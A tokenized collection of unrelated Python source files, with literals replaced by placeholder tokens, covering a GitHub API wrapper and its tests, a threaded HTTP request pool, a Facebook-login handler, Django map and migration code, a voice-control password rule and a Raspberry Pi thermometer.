<EOL> url = self . _build_url ( '<STR_LIT>' , self . name , base_url = base ) <EOL> resp = self . _get ( url , headers = headers ) <EOL> if self . _boolean ( resp , <NUM_LIT:200> , <NUM_LIT> ) : <EOL> return resp . content <EOL> return None <EOL> def protect ( self , enforcement = None , status_checks = None ) : <EOL> """<STR_LIT>""" <EOL> previous_values = self . protection [ '<STR_LIT>' ] <EOL> if enforcement is None : <EOL> enforcement = previous_values [ '<STR_LIT>' ] <EOL> if status_checks is None : <EOL> status_checks = previous_values [ '<STR_LIT>' ] <EOL> edit = { '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : { <EOL> '<STR_LIT>' : enforcement , '<STR_LIT>' : status_checks } } } <EOL> json = self . _json ( self . _patch ( self . _api , data = dumps ( edit ) , <EOL> headers = self . PREVIEW_HEADERS ) , <NUM_LIT:200> ) <EOL> self . _update_attributes ( json ) <EOL> return True <EOL> def unprotect ( self ) : <EOL> """<STR_LIT>""" <EOL> edit = { '<STR_LIT>' : { '<STR_LIT>' : False } } <EOL> json = self . _json ( self . _patch ( self . _api , data = dumps ( edit ) , <EOL> headers = self . PREVIEW_HEADERS ) , <NUM_LIT:200> ) <EOL> self . _update_attributes ( json ) <EOL> return True </s>
<s> from io import BytesIO <EOL> import os <EOL> import sys <EOL> def path ( name , mode = '<STR_LIT:r>' ) : <EOL> return open ( '<STR_LIT>' . format ( name ) , mode ) <EOL> def content ( path_name ) : <EOL> content = path ( path_name ) . read ( ) . strip ( ) <EOL> iterable = '<STR_LIT>' . format ( content ) <EOL> if sys . version_info > ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> content = content . encode ( ) <EOL> iterable = iterable . encode ( ) <EOL> return BytesIO ( content ) , BytesIO ( iterable ) <EOL> default = { } <EOL> iterable = { } <EOL> for file in os . listdir ( '<STR_LIT>' ) : <EOL> default [ file ] , iterable [ file ] = content ( file ) </s>
<s> import os <EOL> import github3 <EOL> import pytest <EOL> from github3 import repos <EOL> from tests . utils import ( BaseCase , load , mock ) <EOL> class TestAsset ( BaseCase ) : <EOL> def __init__ ( self , methodName = '<STR_LIT>' ) : <EOL> super ( TestAsset , self ) . __init__ ( methodName ) <EOL> self . asset = repos . release . Asset ( load ( '<STR_LIT>' ) ) <EOL> self . api = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ pytest . mark . xfail <EOL> def test_download ( self ) : <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . response ( '<STR_LIT>' , <NUM_LIT:200> , ** headers ) <EOL> self . get ( self . api ) <EOL> self . conf . update ( { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } ) <EOL> assert os . path . isfile ( '<STR_LIT:foo>' ) is False <EOL> assert self . asset . download ( ) <EOL> assert os . path . isfile ( '<STR_LIT:foo>' ) <EOL> os . unlink ( '<STR_LIT:foo>' ) <EOL> self . mock_assertions ( ) <EOL> self . request . return_value . raw . seek ( <NUM_LIT:0> ) <EOL> self . request . return_value . _content_consumed = False <EOL> assert os . path . isfile ( '<STR_LIT>' ) is False <EOL> assert self . asset . download ( '<STR_LIT>' ) <EOL> assert os . path . isfile ( '<STR_LIT>' ) <EOL> os . unlink ( '<STR_LIT>' ) <EOL> self . mock_assertions ( ) <EOL> self . request . return_value . raw . seek ( <NUM_LIT:0> ) <EOL> self . request . return_value . _content_consumed = False <EOL> o = mock . mock_open ( ) <EOL> with mock . patch ( '<STR_LIT>' . format ( __name__ ) , o , create = True ) : <EOL> with open ( '<STR_LIT>' , '<STR_LIT>' ) as fd : <EOL> self . asset . download ( fd ) <EOL> o . assert_called_once_with ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fd = o ( ) <EOL> fd . write . assert_called_once_with ( b'<STR_LIT>' ) <EOL> self . mock_assertions ( ) <EOL> self . request . return_value . raw . seek ( <NUM_LIT:0> ) <EOL> self . request . return_value . _content_consumed = False <EOL> r = self . request . return_value <EOL> target = '<STR_LIT>' <EOL> self . response ( '<STR_LIT>' , <NUM_LIT> , location = target ) <EOL> self . get ( target ) <EOL> self . request . side_effect = [ self . request . return_value , r ] <EOL> self . conf [ '<STR_LIT>' ] . update ( { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:Content-Type>' : None , <EOL> } ) <EOL> del self . conf [ '<STR_LIT>' ] <EOL> o = mock . mock_open ( ) <EOL> with mock . patch ( '<STR_LIT>' . format ( __name__ ) , o , create = True ) : <EOL> with open ( '<STR_LIT>' , '<STR_LIT>' ) as fd : <EOL> self . asset . download ( fd ) <EOL> o . assert_called_once_with ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fd = o ( ) <EOL> fd . write . assert_called_once_with ( b'<STR_LIT>' ) <EOL> self . mock_assertions ( ) <EOL> self . response ( '<STR_LIT>' , <NUM_LIT> ) <EOL> self . request . side_effect = None <EOL> assert self . asset . download ( ) is False </s>
<s> import pytest <EOL> import github3 <EOL> from . import helper <EOL> url_for = helper . create_url_helper ( <EOL> '<STR_LIT>' <EOL> ) <EOL> github_url_for = helper . create_url_helper ( <EOL> '<STR_LIT>' <EOL> ) <EOL> key_url_for = helper . create_url_helper ( <EOL> '<STR_LIT>' <EOL> ) <EOL> get_authenticated_user_example_data = helper . create_example_data_helper ( <EOL> '<STR_LIT>' <EOL> ) <EOL> get_users_example_data = helper . create_example_data_helper ( '<STR_LIT>' ) <EOL> get_user_key_example_data = helper . create_example_data_helper ( <EOL> '<STR_LIT>' <EOL> ) <EOL> example_data = get_users_example_data ( ) <EOL> class TestUser ( helper . UnitHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . User <EOL> example_data = get_users_example_data ( ) <EOL> def test_equality ( self ) : <EOL> """<STR_LIT>""" <EOL> user = github3 . users . User ( get_users_example_data ( ) ) <EOL> self . instance == user <EOL> user . _uniq += <NUM_LIT:1> <EOL> assert self . instance != user <EOL> def test_str ( self ) : <EOL> """<STR_LIT>""" <EOL> assert str ( self . instance ) == '<STR_LIT>' <EOL> assert repr ( self . instance ) == '<STR_LIT>' <EOL> def test_is_assignee_on ( self ) : <EOL> """<STR_LIT>""" <EOL> self . instance . is_assignee_on ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . session . get . assert_called_once_with ( <EOL> github_url_for ( '<STR_LIT>' ) <EOL> ) <EOL> def test_is_following ( self ) : <EOL> """<STR_LIT>""" <EOL> self . instance . is_following ( '<STR_LIT>' ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) <EOL> ) <EOL> class TestUserKeyRequiresAuth ( helper . UnitRequiresAuthenticationHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . Key <EOL> example_data = get_user_key_example_data ( ) <EOL> def test_update ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_requires_auth ( self . instance . update , title = '<STR_LIT>' , <EOL> key = '<STR_LIT>' ) <EOL> def test_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_requires_auth ( self . instance . delete ) <EOL> class TestUserKey ( helper . UnitHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . Key <EOL> example_data = get_user_key_example_data ( ) <EOL> def test_equality ( self ) : <EOL> """<STR_LIT>""" <EOL> key = github3 . users . Key ( get_user_key_example_data ( ) ) <EOL> assert self . instance == key <EOL> key . _uniq += "<STR_LIT>" <EOL> assert self . instance != key <EOL> def test_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> assert str ( self . instance ) == self . instance . key <EOL> assert repr ( self . instance ) . startswith ( '<STR_LIT>' ) <EOL> def test_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> self . instance . delete ( ) <EOL> assert self . session . delete . called is True <EOL> def test_update ( self ) : <EOL> """<STR_LIT>""" <EOL> data = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:key>' : '<STR_LIT>' <EOL> } <EOL> self . instance . update ( ** data ) <EOL> self . patch_called_with ( <EOL> key_url_for ( '<STR_LIT:1>' ) , <EOL> data = data <EOL> ) <EOL> class TestUserIterators ( helper . UnitIteratorHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . User <EOL> example_data = example_data . copy ( ) <EOL> def test_events ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . events ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_followers ( self ) : <EOL> """<STR_LIT>""" <EOL> f = self . instance . followers ( ) <EOL> self . get_next ( f ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_following ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . following ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_keys ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . keys ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_organization_events ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . organization_events ( '<STR_LIT>' ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_organization_events_requires_an_org ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . organization_events ( None ) <EOL> with pytest . raises ( StopIteration ) : <EOL> next ( i ) <EOL> def test_organizations ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . organizations ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_received_events ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . received_events ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_received_events_public_only ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . received_events ( True ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> def test_starred_repositories ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . starred_repositories ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> def test_subscriptions ( self ) : <EOL> """<STR_LIT>""" <EOL> i = self . instance . subscriptions ( ) <EOL> self . get_next ( i ) <EOL> self . session . get . assert_called_once_with ( <EOL> url_for ( '<STR_LIT>' ) , <EOL> params = { '<STR_LIT>' : <NUM_LIT:100> } , <EOL> headers = { } <EOL> ) <EOL> class TestUsersRequiresAuth ( helper . UnitRequiresAuthenticationHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . User <EOL> example_data = example_data . copy ( ) <EOL> def test_organization_events ( self ) : <EOL> """<STR_LIT>""" <EOL> with pytest . raises ( github3 . GitHubError ) : <EOL> self . instance . organization_events ( '<STR_LIT:foo>' ) <EOL> class TestPlan ( helper . UnitGitHubObjectHelper ) : <EOL> """<STR_LIT>""" <EOL> described_class = github3 . users . Plan <EOL> example_data = get_authenticated_user_example_data ( ) [ '<STR_LIT>' ] <EOL> def test_str ( self ) : <EOL> """<STR_LIT>""" <EOL> assert str ( self . instance ) == self . instance . name <EOL> assert repr ( self . instance ) == '<STR_LIT>' . format ( self . instance . name ) <EOL> def test_is_free ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . instance . is_free ( ) is False </s>
<s> """<STR_LIT>""" <EOL> from . import pool <EOL> from . . _compat import queue <EOL> def map ( requests , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> if not ( requests and all ( isinstance ( r , dict ) for r in requests ) ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> job_queue = queue . Queue ( ) <EOL> for request in requests : <EOL> job_queue . put ( request ) <EOL> kwargs [ '<STR_LIT>' ] = job_queue <EOL> threadpool = pool . Pool ( ** kwargs ) <EOL> threadpool . join_all ( ) <EOL> return threadpool . responses ( ) , threadpool . exceptions ( ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import queue <EOL> except ImportError : <EOL> import Queue as queue <EOL> import unittest <EOL> import mock <EOL> import pytest <EOL> from requests_toolbelt . threaded import pool <EOL> from requests_toolbelt . threaded import thread <EOL> class TestPool ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_requires_positive_number_of_processes ( self ) : <EOL> """<STR_LIT>""" <EOL> with pytest . raises ( ValueError ) : <EOL> pool . Pool ( None , num_processes = <NUM_LIT:0> ) <EOL> with pytest . raises ( ValueError ) : <EOL> pool . Pool ( None , num_processes = - <NUM_LIT:1> ) <EOL> def test_number_of_processes_can_be_arbitrary ( self ) : <EOL> """<STR_LIT>""" <EOL> p = pool . Pool ( None , num_processes = <NUM_LIT:100> ) <EOL> assert p . _processes == <NUM_LIT:100> <EOL> assert len ( p . _pool ) == <NUM_LIT:100> <EOL> p = pool . Pool ( None , num_processes = <NUM_LIT:1> ) <EOL> assert p . _processes == <NUM_LIT:1> <EOL> assert len ( p . _pool ) == <NUM_LIT:1> <EOL> def test_initializer_is_called ( self ) : <EOL> """<STR_LIT>""" <EOL> initializer = mock . MagicMock ( ) <EOL> pool . Pool ( None , num_processes = <NUM_LIT:1> , initializer = initializer ) <EOL> assert initializer . called is True <EOL> initializer . assert_called_once_with ( mock . ANY ) <EOL> def test_auth_generator_is_called ( self ) : <EOL> """<STR_LIT>""" <EOL> auth_generator = mock . MagicMock ( ) <EOL> pool . Pool ( None , num_processes = <NUM_LIT:1> , auth_generator = auth_generator ) <EOL> assert auth_generator . called is True <EOL> auth_generator . assert_called_once_with ( mock . ANY ) <EOL> def test_session_is_called ( self ) : <EOL> """<STR_LIT>""" <EOL> session = mock . MagicMock ( ) <EOL> pool . Pool ( None , num_processes = <NUM_LIT:1> , session = session ) <EOL> assert session . called is True <EOL> session . assert_called_once_with ( ) <EOL> def test_from_exceptions_populates_a_queue ( self ) : <EOL> """<STR_LIT>""" <EOL> urls = [ "<STR_LIT>" . format ( n ) for n in range ( <NUM_LIT:5> ) ] <EOL> Exc = pool . ThreadException <EOL> excs = ( Exc ( { '<STR_LIT>' : '<STR_LIT:GET>' , '<STR_LIT:url>' : url } , None ) for url in urls ) <EOL> job_queue = mock . MagicMock ( ) <EOL> with mock . patch . object ( queue , '<STR_LIT>' , return_value = job_queue ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> pool . Pool . from_exceptions ( excs ) <EOL> assert job_queue . put . call_count == <NUM_LIT:5> <EOL> assert job_queue . put . mock_calls == [ <EOL> mock . call ( { '<STR_LIT>' : '<STR_LIT:GET>' , '<STR_LIT:url>' : url } ) <EOL> for url in urls <EOL> ] <EOL> def test_from_urls_constructs_get_requests ( self ) : <EOL> """<STR_LIT>""" <EOL> urls = [ "<STR_LIT>" . format ( n ) for n in range ( <NUM_LIT:5> ) ] <EOL> job_queue = mock . MagicMock ( ) <EOL> with mock . patch . object ( queue , '<STR_LIT>' , return_value = job_queue ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> pool . Pool . from_urls ( urls ) <EOL> assert job_queue . put . call_count == <NUM_LIT:5> <EOL> assert job_queue . put . mock_calls == [ <EOL> mock . call ( { '<STR_LIT>' : '<STR_LIT:GET>' , '<STR_LIT:url>' : url } ) <EOL> for url in urls <EOL> ] <EOL> def test_from_urls_constructs_get_requests_with_kwargs ( self ) : <EOL> """<STR_LIT>""" <EOL> def merge ( * args ) : <EOL> final = { } <EOL> for d in args : <EOL> final . update ( d ) <EOL> return final <EOL> urls = [ "<STR_LIT>" . format ( n ) for n in range ( <NUM_LIT:5> ) ] <EOL> kwargs = { '<STR_LIT>' : True , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:application/json>' } } <EOL> job_queue = mock . MagicMock ( ) <EOL> with mock . patch . object ( queue , '<STR_LIT>' , return_value = job_queue ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> pool . Pool . from_urls ( urls , kwargs ) <EOL> assert job_queue . put . call_count == <NUM_LIT:5> <EOL> assert job_queue . put . mock_calls == [ <EOL> mock . call ( merge ( { '<STR_LIT>' : '<STR_LIT:GET>' , '<STR_LIT:url>' : url } , kwargs ) ) <EOL> for url in urls <EOL> ] <EOL> def test_join_all ( self ) : <EOL> """<STR_LIT>""" <EOL> session_threads = [ ] <EOL> def _side_effect ( * args , ** kwargs ) : <EOL> thread = mock . MagicMock ( ) <EOL> session_threads . append ( thread ) <EOL> return thread <EOL> with mock . patch . object ( thread , '<STR_LIT>' , <EOL> side_effect = _side_effect ) : <EOL> pool . Pool ( None ) . join_all ( ) <EOL> for st in session_threads : <EOL> st . join . assert_called_once_with ( ) <EOL> def test_get_response_returns_thread_response ( self ) : <EOL> """<STR_LIT>""" <EOL> queues = [ ] <EOL> def _side_effect ( ) : <EOL> q = mock . MagicMock ( ) <EOL> q . get_nowait . return_value = ( { } , None ) <EOL> queues . append ( q ) <EOL> return q <EOL> with mock . patch . object ( queue , '<STR_LIT>' , side_effect = _side_effect ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> p = pool . Pool ( None ) <EOL> assert len ( queues ) == <NUM_LIT:2> <EOL> assert isinstance ( p . get_response ( ) , pool . ThreadResponse ) <EOL> assert len ( [ q for q in queues if q . get_nowait . called ] ) == <NUM_LIT:1> <EOL> def test_get_exception_returns_thread_exception ( self ) : <EOL> """<STR_LIT>""" <EOL> queues = [ ] <EOL> def _side_effect ( ) : <EOL> q = mock . MagicMock ( ) <EOL> q . get_nowait . return_value = ( { } , None ) <EOL> queues . append ( q ) <EOL> return q <EOL> with mock . patch . object ( queue , '<STR_LIT>' , side_effect = _side_effect ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> p = pool . Pool ( None ) <EOL> assert len ( queues ) == <NUM_LIT:2> <EOL> assert isinstance ( p . get_exception ( ) , pool . ThreadException ) <EOL> assert len ( [ q for q in queues if q . get_nowait . called ] ) == <NUM_LIT:1> <EOL> def test_get_response_returns_none_when_queue_is_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> queues = [ ] <EOL> def _side_effect ( ) : <EOL> q = mock . MagicMock ( ) <EOL> q . get_nowait . side_effect = queue . Empty ( ) <EOL> queues . append ( q ) <EOL> return q <EOL> with mock . patch . object ( queue , '<STR_LIT>' , side_effect = _side_effect ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> p = pool . Pool ( None ) <EOL> assert len ( queues ) == <NUM_LIT:2> <EOL> assert p . get_response ( ) is None <EOL> assert len ( [ q for q in queues if q . get_nowait . called ] ) == <NUM_LIT:1> <EOL> def test_get_exception_returns_none_when_queue_is_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> queues = [ ] <EOL> def _side_effect ( ) : <EOL> q = mock . MagicMock ( ) <EOL> q . get_nowait . side_effect = queue . Empty ( ) <EOL> queues . append ( q ) <EOL> return q <EOL> with mock . patch . object ( queue , '<STR_LIT>' , side_effect = _side_effect ) : <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> p = pool . Pool ( None ) <EOL> assert len ( queues ) == <NUM_LIT:2> <EOL> assert p . get_exception ( ) is None <EOL> assert len ( [ q for q in queues if q . get_nowait . called ] ) == <NUM_LIT:1> <EOL> def test_lists_are_correctly_returned ( self ) : <EOL> """<STR_LIT>""" <EOL> def _make_queue ( ) : <EOL> q = queue . Queue ( ) <EOL> q . put ( ( { } , None ) ) <EOL> return q <EOL> with mock . patch . object ( thread , '<STR_LIT>' ) : <EOL> p = pool . Pool ( None ) <EOL> p . _response_queue = _make_queue ( ) <EOL> p . _exc_queue = _make_queue ( ) <EOL> excs = list ( p . exceptions ( ) ) <EOL> assert len ( excs ) == <NUM_LIT:1> <EOL> for exc in excs : <EOL> assert isinstance ( exc , pool . ThreadException ) <EOL> resps = list ( p . responses ( ) ) <EOL> assert len ( resps ) == <NUM_LIT:1> <EOL> for resp in resps : <EOL> assert isinstance ( resp , pool . ThreadResponse ) </s>
<s> """<STR_LIT>""" <EOL> from indico . utils . auth . auth_utils import auth , user_hash <EOL> from indico . utils . auth . facebook_utils import check_access_token <EOL> from indico . error import FacebookTokenError <EOL> from indico . utils import unpack , mongo_callback , type_check <EOL> from indico . routes . handler import IndicoHandler <EOL> from indico . db import current_time <EOL> import indico . db . user_db as UserDB <EOL> import indico . db . auth_db as AuthDB <EOL> class AuthHandler ( IndicoHandler ) : <EOL> @ unpack ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:user>" ) <EOL> @ type_check ( str , str , dict ) <EOL> def login ( self , access_token , oauth_id , user ) : <EOL> if not check_access_token ( access_token ) : <EOL> raise FacebookTokenError ( ) <EOL> @ mongo_callback ( self ) <EOL> def sync_callback ( result ) : <EOL> self . respond ( { <EOL> "<STR_LIT:user>" : result , <EOL> "<STR_LIT>" : indico_key <EOL> } ) <EOL> @ mongo_callback ( self ) <EOL> def find_callback ( result ) : <EOL> if not result : <EOL> user [ "<STR_LIT>" ] = current_time ( ) <EOL> UserDB . sync_user ( user , "<STR_LIT>" + oauth_id , sync_callback ) <EOL> @ mongo_callback ( self ) <EOL> def save_key_callback ( result ) : <EOL> UserDB . find_user ( user_id , find_callback ) <EOL> user_id = "<STR_LIT>" + oauth_id <EOL> indico_key = user_hash ( user_id ) <EOL> AuthDB . save_key ( indico_key , user_id , save_key_callback ) <EOL> @ auth <EOL> def check ( self , data ) : <EOL> self . respond ( True ) <EOL> AuthRoute = ( r"<STR_LIT>" , AuthHandler ) </s>
<s> import sys <EOL> sys . stdout . write ( '<STR_LIT>' % sys . argv [ <NUM_LIT:2> ] ) <EOL> sys . stderr . write ( '<STR_LIT>' % sys . argv [ <NUM_LIT:2> ] ) <EOL> sys . exit ( int ( sys . argv [ <NUM_LIT:1> ] ) ) </s>
<s> from __future__ import unicode_literals <EOL> from collections import OrderedDict <EOL> try : <EOL> from urllib import urlencode <EOL> except ImportError : <EOL> from urllib . parse import urlencode <EOL> from django . conf import settings <EOL> from . base import BaseMapBackend <EOL> class YandexMapBackend ( BaseMapBackend ) : <EOL> NAME = '<STR_LIT>' <EOL> API_URL = '<STR_LIT>' <EOL> def get_api_js ( self ) : <EOL> params = OrderedDict ( ) <EOL> params [ '<STR_LIT>' ] = settings . LANGUAGE_CODE <EOL> if self . API_KEY : <EOL> params [ '<STR_LIT>' ] = self . API_KEY <EOL> return '<STR_LIT>' . format ( js_lib = self . API_URL , params = urlencode ( params ) ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import users . models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterModelManagers ( <EOL> name = '<STR_LIT>' , <EOL> managers = [ <EOL> ( '<STR_LIT>' , users . models . CustomUserManager ( ) ) , <EOL> ] , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ManyToManyField ( related_name = '<STR_LIT>' , verbose_name = '<STR_LIT>' , blank = True , to = '<STR_LIT>' , related_query_name = '<STR_LIT:user>' , help_text = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . BooleanField ( default = False ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . BooleanField ( verbose_name = '<STR_LIT>' , default = False , help_text = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ManyToManyField ( related_name = '<STR_LIT>' , verbose_name = '<STR_LIT>' , blank = True , to = '<STR_LIT>' , related_query_name = '<STR_LIT:user>' , help_text = '<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> from dragonfly import ( Grammar , MappingRule , Key , Config , Section , Item , Text , Dictation ) <EOL> from dragonfly . windows . clipboard import Clipboard <EOL> class PasswordRule ( MappingRule ) : <EOL> name = "<STR_LIT>" <EOL> mapping = { <EOL> "<STR_LIT>" : Text ( '<STR_LIT>' ) , <EOL> } <EOL> extras = [ <EOL> Dictation ( "<STR_LIT:text>" , format = False ) , <EOL> ] <EOL> def _process_recognition ( self , value , extras ) : <EOL> getPassword = Key ( "<STR_LIT>" ) + value + Key ( '<STR_LIT>' ) <EOL> getPassword . execute ( ) <EOL> clipboard = Clipboard ( ) <EOL> clipboard . copy_from_system ( clear = True ) <EOL> password = clipboard . get_text ( ) <EOL> action = Text ( password ) <EOL> action . execute ( ) <EOL> grammar = Grammar ( "<STR_LIT>" ) <EOL> grammar . add_rule ( PasswordRule ( ) ) <EOL> grammar . load ( ) <EOL> def unload ( ) : <EOL> global grammar <EOL> if grammar : grammar . unload ( ) <EOL> grammar = None </s>
<s> from Tkinter import * <EOL> import RPi . GPIO as GPIO <EOL> import time , math <EOL> C = <NUM_LIT> <EOL> R1 = <NUM_LIT:1000> <EOL> B = <NUM_LIT> <EOL> R0 = <NUM_LIT> <EOL> GPIO . setmode ( GPIO . BCM ) <EOL> a_pin = <NUM_LIT> <EOL> b_pin = <NUM_LIT> <EOL> buzzer_pin = <NUM_LIT> <EOL> GPIO . setup ( buzzer_pin , GPIO . OUT ) <EOL> set_temp = <NUM_LIT> <EOL> def discharge ( ) : <EOL> GPIO . setup ( a_pin , GPIO . IN ) <EOL> GPIO . setup ( b_pin , GPIO . OUT ) <EOL> GPIO . output ( b_pin , False ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> def charge_time ( ) : <EOL> GPIO . setup ( b_pin , GPIO . IN ) <EOL> GPIO . setup ( a_pin , GPIO . OUT ) <EOL> GPIO . output ( a_pin , True ) <EOL> t1 = time . time ( ) <EOL> while not GPIO . input ( b_pin ) : <EOL> pass <EOL> t2 = time . time ( ) <EOL> return ( t2 - t1 ) * <NUM_LIT> <EOL> def analog_read ( ) : <EOL> discharge ( ) <EOL> t = charge_time ( ) <EOL> discharge ( ) <EOL> return t <EOL> def read_resistance ( ) : <EOL> n = <NUM_LIT:10> <EOL> total = <NUM_LIT:0> ; <EOL> for i in range ( <NUM_LIT:0> , n ) : <EOL> total = total + analog_read ( ) <EOL> t = total / float ( n ) <EOL> T = t * <NUM_LIT> * <NUM_LIT> <EOL> r = ( T / C ) - R1 <EOL> return r <EOL> def read_temp_c ( ) : <EOL> R = read_resistance ( ) <EOL> t0 = <NUM_LIT> <EOL> t25 = t0 + <NUM_LIT> <EOL> inv_T = <NUM_LIT:1> / t25 + <NUM_LIT:1> / B * math . log ( R / R0 ) <EOL> T = ( <NUM_LIT:1> / inv_T - t0 ) <EOL> return T <EOL> def buzz ( pitch , duration ) : <EOL> period = <NUM_LIT:1.0> / pitch <EOL> delay = period / <NUM_LIT:2> <EOL> cycles = int ( duration * pitch ) <EOL> for i in range ( cycles ) : <EOL> GPIO . output ( buzzer_pin , True ) <EOL> time . sleep ( delay ) <EOL> GPIO . output ( buzzer_pin , False ) <EOL> time . sleep ( delay ) <EOL> class App : <EOL> def __init__ ( self , master ) : <EOL> self . master = master <EOL> frame = Frame ( master ) <EOL> frame . pack ( ) <EOL> label = Label ( frame , text = '<STR_LIT>' , font = ( "<STR_LIT>" , <NUM_LIT:32> ) ) <EOL> label . grid ( row = <NUM_LIT:0> ) <EOL> self . reading_label = Label ( frame , text = '<STR_LIT>' , font = ( "<STR_LIT>" , <NUM_LIT> ) ) <EOL> self . reading_label . grid ( row = <NUM_LIT:1> ) <EOL> self . update_reading ( ) <EOL> def update_reading ( self ) : <EOL> temp_c = read_temp_c ( ) <EOL> temp_f = temp_c * <NUM_LIT> / <NUM_LIT> + <NUM_LIT> <EOL> if temp_c > set_temp : <EOL> buzz ( <NUM_LIT> , <NUM_LIT> ) <EOL> reading_str = "<STR_LIT>" . format ( temp_f ) <EOL> self . reading_label . configure ( text = reading_str ) <EOL> self . master . after ( <NUM_LIT> , self . update_reading ) <EOL> root = Tk ( ) <EOL> root . wm_title ( '<STR_LIT>' ) <EOL> app = App ( root ) <EOL> root . geometry ( "<STR_LIT>" ) <EOL> try : <EOL> root . mainloop ( ) <EOL> finally : <EOL> print ( "<STR_LIT>" ) <EOL> GPIO . cleanup ( ) </s>
